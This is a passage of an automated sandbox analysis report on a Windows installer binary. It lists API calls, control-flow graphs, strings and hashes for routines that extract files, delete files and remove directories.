                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,00000000,DF534560,?,?), ref: 002D85E9
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 002D85F3
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$ErrorLast$Close$Find$CreateHandle$ChangeDeleteDiskFirstFormatFreeMessageNotificationPointerReadSpaceWrite
                                                                                                                                                                                                                                                                          • String ID: Error:$Failed to extract file:$Not enough disk space to extract file:$tU/$t=$t=
                                                                                                                                                                                                                                                                          • API String ID: 4292054313-1465471974
                                                                                                                                                                                                                                                                          • Opcode ID: e2559466dff794a4fd36538659a30140e5cd669b2b23c004432e4a61e1b01d09
                                                                                                                                                                                                                                                                          • Instruction ID: c585c1bdae59c40c83091eb9a09e383f4bc6272bb830ba9a867ed035c4ac9690
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2559466dff794a4fd36538659a30140e5cd669b2b23c004432e4a61e1b01d09
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6742F271A00205EFDB10DF68C884BAEBBB5FF45324F14826AE915AB391DB74ED15CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 002C9C90
                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D), ref: 002C9D77
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D), ref: 002C9F5D
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D), ref: 002C9E55
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9120: FindResourceW.KERNEL32(00000000,?,00000006,-00000010,?,?,001BCB50,-00000010,?,002F55F7,00000008,DF534560), ref: 001B9143
                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,WindowsVolume,0000000D), ref: 002C9EC1
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002CA085
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(shfolder.dll), ref: 002CA09B
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 002CA0CD
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DirectoryInit_thread_footer$Windows$AddressFileFindHeapLibraryLoadModuleNamePathProcProcessResourceSystemTemp
                                                                                                                                                                                                                                                                          • String ID: ProgramFiles64Folder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
                                                                                                                                                                                                                                                                          • API String ID: 1332424260-2142986682
                                                                                                                                                                                                                                                                          • Opcode ID: b58de36dece638a71c4a09d0001554252b16ceec61e518f4ccabf8e6dddfdaab
                                                                                                                                                                                                                                                                          • Instruction ID: e655119971b448f3b48953f069bf3f2074af3ab0b89eb14a72ff678f20c8b7e5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b58de36dece638a71c4a09d0001554252b16ceec61e518f4ccabf8e6dddfdaab
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D122E17061020A8BDB24DF28CC89FEAB3B5EF55304F5443ADE50A9B291DB719E91CB85
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2188 2d8bb0-2d8be5 2189 2d8beb-2d8c10 SetFilePointer 2188->2189 2190 2d8e87-2d8e98 2188->2190 2191 2d8c9a-2d8cba 2189->2191 2192 2d8c16-2d8c4a GetLastError call 2b9370 call 2b62a0 2189->2192 2194 2d8e6c 2191->2194 2195 2d8cc0-2d8cdc ReadFile 2191->2195 2209 2d8c4c 2192->2209 2210 2d8c4f-2d8c79 call 2c4d10 2192->2210 2197 2d8e6e-2d8e85 call 349bf5 2194->2197 2198 2d8f43-2d8f77 GetLastError call 2b9370 call 2b62a0 2195->2198 2199 2d8ce2-2d8ce6 2195->2199 2197->2190 2216 2d8f7c-2d8fa5 call 2c4d10 2198->2216 2217 2d8f79 2198->2217 2199->2198 2203 2d8cec-2d8cf9 call 1b9e20 2199->2203 2213 2d8cff-2d8d18 2203->2213 2214 2d8fb9-2d8fc3 call 1b9ae0 2203->2214 2209->2210 2222 2d8c7b-2d8c7e 2210->2222 2223 2d8c83-2d8c99 2210->2223 2226 2d8d2a-2d8d3c call 2c9240 2213->2226 2227 2d8d1a-2d8d23 call 349bf5 2213->2227 2228 2d8faf-2d8fb4 2216->2228 2229 2d8fa7-2d8faa 2216->2229 2217->2216 2222->2223 2234 2d8f0c 2226->2234 2235 2d8d42-2d8d59 ReadFile 2226->2235 2227->2226 2228->2197 2229->2228 2236 2d8f11-2d8f30 2234->2236 2237 2d8d5f-2d8d63 2235->2237 2238 2d8e99-2d8ecd GetLastError call 2b9370 call 2b62a0 2235->2238 2236->2197 2239 2d8f36-2d8f3e 2236->2239 2237->2238 2240 2d8d69-2d8d74 2237->2240 2252 2d8ecf 2238->2252 2253 2d8ed2-2d8efb call 2c4d10 2238->2253 2239->2197 2242 2d8d8f-2d8dad call 1b9990 2240->2242 2243 2d8d76-2d8d7b 2240->2243 2254 2d8daf-2d8db6 2242->2254 2255 2d8df2-2d8e06 2242->2255 2247 2d8d80-2d8d89 2243->2247 2247->2247 2250 2d8d8b-2d8d8d 2247->2250 2250->2242 2252->2253 2269 2d8efd-2d8f00 2253->2269 2270 2d8f05-2d8f0a 2253->2270 2257 2d8dc8-2d8dca 2254->2257 2258 2d8db8-2d8dc2 2254->2258 2259 2d8e29-2d8e2d 2255->2259 2260 2d8e08-2d8e25 call 1b9620 2255->2260 2263 2d8dcc-2d8dcf 2257->2263 2264 2d8dd1-2d8dd3 2257->2264 2258->2214 2258->2257 2261 2d8e30-2d8e4f 2259->2261 2260->2259 2267 2d8e59-2d8e66 2261->2267 2268 2d8e51-2d8e54 2261->2268 2271 2d8ddd-2d8deb call 352fe8 2263->2271 2264->2261 2272 2d8dd5-2d8ddb 2264->2272 2267->2194 2267->2195 2268->2267 2269->2270 2270->2236 2271->2261 2275 2d8ded-2d8df0 2271->2275 2272->2261 2272->2271 2275->2255
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000,DF534560,?,?,00000002,?,?,?,?,?,?,00000000,003B5B02), ref: 002D8C07
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002), ref: 002D8E99
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002), ref: 002D8F43
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,?,00000000,003B5B02,000000FF,?,002D7B1A,00000010), ref: 002D8C16
                                                                                                                                                                                                                                                                            • Part of subcall function 002B9370: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,DF534560,?,00000000), ref: 002B93BB
                                                                                                                                                                                                                                                                            • Part of subcall function 002B9370: GetLastError.KERNEL32(?,00000000), ref: 002B93C5
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000008,80070057,00000000,?,00000002), ref: 002D8CD8
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,DF534560,00000000,00000000,00000000,00000001,?,00000002), ref: 002D8D55
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$File$Read$FormatMessagePointer
                                                                                                                                                                                                                                                                          • String ID: t=$t=$t=
                                                                                                                                                                                                                                                                          • API String ID: 3903527278-220515560
                                                                                                                                                                                                                                                                          • Opcode ID: 604925df8390c3b724a33defdc18f4067fb96dbfa73b1ac4237363eb0cc8d503
                                                                                                                                                                                                                                                                          • Instruction ID: 6ff3e14a318c8cfef8e82ecde23cfb3597450e4c3e97ab36b0f16a0f4a0598d5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 604925df8390c3b724a33defdc18f4067fb96dbfa73b1ac4237363eb0cc8d503
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AD18171D1020ADFDB00DFA8C885BAEB7B5FF45314F14826AE815AB392DB74AD15CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2284 2ce310-2ce34c call 1b9e20 2287 2ce48f-2ce54e call 1b9ae0 call 2ce310 call 2ef190 2284->2287 2288 2ce352-2ce38a call 2e3820 2284->2288 2303 2ce550-2ce559 2287->2303 2296 2ce38c-2ce38f 2288->2296 2297 2ce394-2ce3c3 GetTickCount call 3484da call 349f80 call 1b9e20 2288->2297 2296->2297 2297->2287 2313 2ce3c9-2ce450 call 370940 call 1b8d10 call 2e3820 call 2e3960 call 1b9620 2297->2313 2303->2303 2305 2ce55b-2ce580 call 1b7160 2303->2305 2311 2ce5e9-2ce606 call 1b6610 2305->2311 2312 2ce582-2ce596 call 349842 2305->2312 2319 2ce60f 2311->2319 2320 2ce608-2ce60d 2311->2320 2312->2311 2321 2ce598-2ce5e6 call 1b7160 call 3496fa call 3497f8 2312->2321 2361 2ce45a-2ce46f 2313->2361 2362 2ce452-2ce455 2313->2362 2323 2ce612-2ce622 2319->2323 2320->2323 2321->2311 2326 2ce628-2ce62d 2323->2326 2327 2ce6ab-2ce6ef call 349379 2323->2327 2331 2ce630-2ce64e 2326->2331 2342 2ce6f3-2ce6fc 2327->2342 2336 2ce694-2ce69d 2331->2336 2337 2ce650-2ce656 2331->2337 2336->2331 2341 2ce69f-2ce6a5 2336->2341 2343 2ce658-2ce65e 2337->2343 2344 2ce67a-2ce67c 2337->2344 2341->2327 2342->2342 2349 2ce6fe-2ce748 call 1b7160 2342->2349 2350 2ce660-2ce663 2343->2350 2351 2ce672 2343->2351 2346 2ce67e-2ce685 2344->2346 2347 2ce68f 2344->2347 2346->2347 2352 2ce687-2ce68c 2346->2352 2347->2336 2360 2ce750-2ce759 2349->2360 2355 2ce674 2350->2355 2356 2ce665-2ce670 2350->2356 2351->2355 2352->2347 2355->2344 2356->2350 2356->2351 2360->2360 2363 2ce75b-2ce838 call 1b7160 call 1b6610 * 4 call 1b78d0 * 2 2360->2363 2364 2ce479-2ce48c 2361->2364 2365 2ce471-2ce474 2361->2365 2362->2361 2380 2ce83a-2ce85c 2363->2380 2381 2ce8b2-2ce8c1 2363->2381 2365->2364 2384 2ce85e-2ce8ae call 1b78d0 * 4 call 349348 2380->2384 2385 2ce8b0 2380->2385 2382 2ce90f-2ce952 call 1b78d0 * 3 2381->2382 2383 2ce8c3-2ce90c call 1b78d0 * 4 call 349348 2381->2383 2406 2ce95c-2ce99b GetCurrentProcess 2382->2406 2407 2ce954-2ce957 2382->2407 2383->2382 2384->2381 2385->2381 2421 2ce9dc 2406->2421 2422 2ce99d-2ce9b9 2406->2422 2410 2cea10-2cea2e 2407->2410 2414 2cea38-2cea53 call 34933a 2410->2414 2415 2cea30-2cea33 2410->2415 2415->2414 2423 2ce9e1-2ce9fd 2421->2423 2424 2ce9c5-2ce9c7 2422->2424 2423->2410 2425 2ce9ff-2cea06 CloseHandle 2423->2425 2424->2421 2426 2ce9c9-2ce9da 2424->2426 2425->2410 2426->2423
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 002CE394
                                                                                                                                                                                                                                                                          • __Xtime_get_ticks.LIBCPMT ref: 002CE39C
                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002CE3E6
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002CE5E1
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 002CE983
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 002CEA00
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$Process$CloseCountCurrentHandleHeapTickUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                          • String ID: \/:*?"<>|$t=
                                                                                                                                                                                                                                                                          • API String ID: 2307806820-1724533292
                                                                                                                                                                                                                                                                          • Opcode ID: 8a08a11e09fe64bd94a3e2cbe174cb9585b765d08d3c1c85ae70d6d0488a7e54
                                                                                                                                                                                                                                                                          • Instruction ID: fadc87879fd29bebf0b7650c781efefe9e2192ffe3311f5d9366fa27e58f81e4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a08a11e09fe64bd94a3e2cbe174cb9585b765d08d3c1c85ae70d6d0488a7e54
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51228C70910259DFDB10DF68CC45BEEBBB4BF55304F1482ADE409AB292DBB4AA44CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2427 6a5528d0-6a552919 call 6a552250 2429 6a552acd-6a552ad6 call 6a547130 2427->2429 2430 6a55291f-6a552928 call 6a547130 2427->2430 2435 6a5529f7-6a552a87 call 6a545ef0 call 6a546a10 call 6a553010 call 6a547090 call 6a548070 call 6a558750 2429->2435 2437 6a552adc-6a552aea call 6a547130 call 6a547e10 2429->2437 2430->2435 2436 6a55292e-6a55293c call 6a547130 call 6a547e10 2430->2436 2475 6a552a89 2435->2475 2476 6a552a8b-6a552a92 call 6a55b570 2435->2476 2450 6a552e93-6a552ea3 call 6a547ad0 2436->2450 2451 6a552942-6a552972 call 6a547620 call 6a547e10 2436->2451 2437->2450 2452 6a552af0-6a552b20 call 6a547620 call 6a547e10 2437->2452 2451->2450 2473 6a552978-6a5529c8 call 6a547620 call 6a547210 2451->2473 2452->2450 2474 6a552b26-6a552b76 call 6a547620 call 6a547210 2452->2474 2493 6a5529d2-6a5529ed 2473->2493 2494 6a5529ca-6a5529cd 2473->2494 2495 6a552b80 2474->2495 2496 6a552b78-6a552b7b 2474->2496 2475->2476 2480 6a552a97-6a552aa7 call 6a547090 2476->2480 2490 6a552e43-6a552e7f call 6a548120 call 6a547090 call 6a56cbbc 2480->2490 2491 6a552aad 2480->2491 2497 6a552ab3-6a552aba 2491->2497 2493->2435 2499 6a5529ef-6a5529f2 2493->2499 2494->2493 2500 6a552b85-6a552b87 2495->2500 2496->2495 2497->2500 2501 6a552ac0-6a552ac8 2497->2501 2499->2435 2503 6a552b93-6a552bae FindNextFileW 2500->2503 2504 6a552b89-6a552b91 2500->2504 2505 6a552bb4-6a552bb6 2501->2505 2503->2505 2507 6a552bf7-6a552c3d call 6a55b970 2504->2507 2505->2507 2508 6a552bb8-6a552bc7 2505->2508 2516 6a552c40-6a552c49 2507->2516 2508->2507 2511 6a552bc9-6a552bd1 2508->2511 2511->2507 2515 6a552bd3-6a552bdd 2511->2515 2517 6a552be3-6a552be7 2515->2517 2518 6a552e3b-6a552e3d 2515->2518 2516->2516 2519 6a552c4b-6a552c8d call 6a546a10 call 6a558500 call 6a547090 2516->2519 2517->2507 2520 6a552be9-6a552bf1 2517->2520 2518->2490 2518->2497 2527 6a552c97-6a552cef call 6a546a10 call 6a5585f0 call 6a547090 2519->2527 2528 6a552c8f-6a552c92 2519->2528 2520->2507 2520->2518 2535 6a552cf5-6a552d04 call 6a552250 2527->2535 2536 6a552e07-6a552e0e 2527->2536 2528->2527 2542 6a552dd6-6a552ded call 6a558750 2535->2542 2543 6a552d0a-6a552d27 call 6a558750 2535->2543 2537 6a552e10-6a552e17 2536->2537 2538 6a552e29-6a552e35 call 6a547090 2536->2538 2537->2538 2540 6a552e19-6a552e24 call 6a5528d0 2537->2540 2538->2518 2540->2538 2550 6a552df1-6a552e02 DeleteFileW call 6a547090 2542->2550 2551 6a552def 2542->2551 2552 6a552d2d-6a552d57 call 6a551810 call 6a553560 2543->2552 2553 6a552dbb-6a552dd0 call 6a547090 2543->2553 2550->2536 2551->2550 2561 6a552dac-6a552db6 call 6a553810 2552->2561 2562 6a552d59 2552->2562 2553->2542 2561->2553 2564 6a552d60-6a552d62 2562->2564 2565 6a552d65 call 6a551a60 2564->2565 2566 6a552d6a-6a552d8c call 6a552eb0 call 6a54b860 2565->2566 2570 6a552d91-6a552d93 2566->2570 2571 6a552e82-6a552e8e call 6a549c30 2570->2571 2572 6a552d99-6a552daa call 6a549c30 2570->2572 2571->2561 2572->2561 2572->2564
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547E10: GetProcessHeap.KERNEL32 ref: 6A547E6C
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547210: #17.MSI(00000002,?,00000000,?,AA831995), ref: 6A5472C2
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547210: #125.MSI(00000000,00000000,[1],?,AA831995), ref: 6A5472D9
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547210: #125.MSI(00000000,00000001,AA831995,?,AA831995), ref: 6A5472E6
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547210: #103.MSI(00000000,04000000,00000000,?,AA831995), ref: 6A5472F8
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547210: #8.MSI(00000000,?,AA831995), ref: 6A547307
                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,00000000,?,00000000,*.*,00000003,7FFFFFFE,?,6A5D5C04,?), ref: 6A552BA0
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,6A5D5C04,?), ref: 6A552DF2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: #125File$#103DeleteFindHeapNextProcess
                                                                                                                                                                                                                                                                          • String ID: "$*.*$.$Logging is disabled, discard collected data.$Logging is enabled, sending data ...$session
                                                                                                                                                                                                                                                                          • API String ID: 1195310492-512075754
                                                                                                                                                                                                                                                                          • Opcode ID: 804d9a965c94c90996bb80b3e57c19e40c6189bd0f5b813d593829ab85a447a5
                                                                                                                                                                                                                                                                          • Instruction ID: 3f66ebb00b47e48a0462a752cab7d7f03d63fdfa30450553c0731b7e8ccf850b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 804d9a965c94c90996bb80b3e57c19e40c6189bd0f5b813d593829ab85a447a5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86F1AF70804258DBDB26DBA4C858BDEBBB4EF45318F1186DAD409A7292DF709F48CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2579 2b5d90-2b5dc0 2580 2b5e60-2b5e6b RemoveDirectoryW 2579->2580 2581 2b5dc6-2b5dcd call 2b62a0 2579->2581 2582 2b5e6e-2b5e70 2580->2582 2581->2580 2587 2b5dd3-2b5ddc call 1b9e20 2581->2587 2584 2b5e78-2b5e8a 2582->2584 2585 2b5e72 GetLastError 2582->2585 2585->2584 2590 2b5e8b-2b5ed0 call 1b9ae0 2587->2590 2591 2b5de2-2b5e01 2587->2591 2600 2b5f70-2b5f7b DeleteFileW 2590->2600 2601 2b5ed6-2b5edd call 2b62a0 2590->2601 2595 2b5e0e-2b5e15 call 1b9990 2591->2595 2596 2b5e03-2b5e0c call 1b9120 2591->2596 2604 2b5e1a-2b5e54 call 1cf3c0 RemoveDirectoryW 2595->2604 2596->2604 2605 2b5f7e-2b5f80 2600->2605 2601->2600 2610 2b5ee3-2b5eec call 1b9e20 2601->2610 2604->2582 2612 2b5e56-2b5e5e 2604->2612 2608 2b5f88-2b5f9a 2605->2608 2609 2b5f82 GetLastError 2605->2609 2609->2608 2616 2b5f9b-2b5fe5 call 1b9ae0 call 1b9e20 2610->2616 2617 2b5ef2-2b5f11 2610->2617 2612->2582 2631 2b5feb-2b6007 2616->2631 2632 2b610a-2b6114 call 1b9ae0 2616->2632 2621 2b5f1e-2b5f25 call 1b9990 2617->2621 2622 2b5f13-2b5f1c call 1b9120 2617->2622 2629 2b5f2a-2b5f64 call 1cf3c0 DeleteFileW 2621->2629 2622->2629 2629->2605 2635 2b5f66-2b5f6e 2629->2635 2638 2b600d-2b600f 2631->2638 2639 2b6100-2b6105 call 1b9ae0 2631->2639 2635->2605 2638->2639 2641 2b6015-2b601d 2638->2641 2639->2632 2643 2b6058-2b605c call 1cfdb0 2641->2643 2644 2b601f-2b604c call 1c3120 call 1cfdb0 2641->2644 2647 2b6061-2b606c 2643->2647 2644->2647 2656 2b604e-2b6056 2644->2656 2649 2b60cf-2b60e4 2647->2649 2650 2b606e-2b607b call 34aa77 2647->2650 2653 2b60ee-2b60ff 2649->2653 2654 2b60e6-2b60e9 2649->2654 2658 2b607d-2b6080 2650->2658 2659 2b6082-2b6084 2650->2659 2654->2653 2656->2647 2661 2b6086-2b609d call 1c3120 2658->2661 2659->2661 2664 2b609f-2b60a1 call 2b5d90 2661->2664 2665 2b60b1-2b60c5 2661->2665 2668 2b60a6-2b60ac call 2b5fb0 2664->2668 2665->2649 2666 2b60c7-2b60ca 2665->2666 2666->2649 2668->2665
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,002B6813), ref: 002B5E33
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9120: FindResourceW.KERNEL32(00000000,?,00000006,-00000010,?,?,001BCB50,-00000010,?,002F55F7,00000008,DF534560), ref: 001B9143
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9AE0: RtlAllocateHeap.NTDLL(?,00000000,?,DF534560,00000000,00371390,000000FF,?,?,0044E7AC,?,001BCB99,80004005,DF534560,-00000010,?), ref: 001B9B2A
                                                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000008,DF534560,00000008,00000000,00000008,00000000,003AE8AD,000000FF,?,002B6813), ref: 002B5E62
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,002B6813,?,?,?,?,?,?,?,?,?,?,?,?,003BB955,000000FF), ref: 002B5E72
